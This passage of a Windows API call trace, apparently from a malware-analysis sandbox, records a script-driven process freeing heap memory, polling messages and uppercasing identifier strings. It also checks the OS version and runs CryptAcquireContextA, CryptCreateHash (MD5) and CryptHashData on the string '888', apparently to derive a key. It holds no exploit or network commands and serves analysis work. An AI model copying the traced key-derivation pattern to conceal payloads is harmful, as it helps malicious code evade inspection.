dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0156.394] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0156.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0156.395] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0156.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0156.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0156.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0156.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0156.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0156.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0156.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0156.395] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0156.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0156.395] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0156.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0156.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0156.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0156.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0156.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0156.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0156.395] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0156.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0156.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0156.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0156.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0156.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0156.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0156.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0156.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0156.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0156.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0156.395] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0156.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0156.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0156.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0156.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0156.396] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0156.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0156.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0156.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0156.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0156.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0156.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0156.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0156.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0156.396] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0156.396] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0156.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0156.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0156.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0156.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0156.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0156.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0156.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0156.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0156.396] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.396] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0156.396] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0156.397] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0156.397] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0156.397] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0156.397] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0156.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0156.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f70a0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0156.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0156.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f71e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0156.397] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bee68) returned 1 [0156.398] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.398] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.398] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0156.398] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0156.398] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0156.398] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0156.398] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0156.398] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0156.398] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.398] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.398] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.398] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0156.398] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0156.398] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0156.398] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0156.398] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0156.398] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0156.399] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.399] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.399] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.399] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.399] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0156.399] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.399] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0156.399] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.399] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.399] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.399] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.399] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.399] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.399] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.399] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0156.399] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0156.399] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0156.399] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0156.399] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0156.399] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0156.399] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0156.399] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0156.399] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0156.399] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0156.400] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0156.400] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0156.400] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0156.400] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0156.400] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0156.400] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0156.400] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0156.400] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0156.400] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0156.400] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.400] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.400] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0156.400] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0156.400] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0156.400] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0156.400] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0156.400] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0156.400] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0156.400] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0156.400] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0156.400] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0156.400] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0156.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0156.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaad20, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0156.401] CryptCreateHash (in: hProv=0x9bee68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0156.401] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.401] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.401] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.401] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0156.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0156.401] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0156.401] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0156.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a719a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0156.401] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.401] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0156.401] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0156.401] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0156.401] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0156.401] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0156.401] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0156.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0156.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaae28, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0156.401] CryptHashData (hHash=0x9e1e38, pbData=0x2a719c8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0156.480] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.480] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.481] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.481] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0156.481] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0156.481] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0156.481] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0156.481] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0156.481] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0156.481] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0156.481] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0156.481] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0156.481] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0156.481] CharLowerBuffW (in: 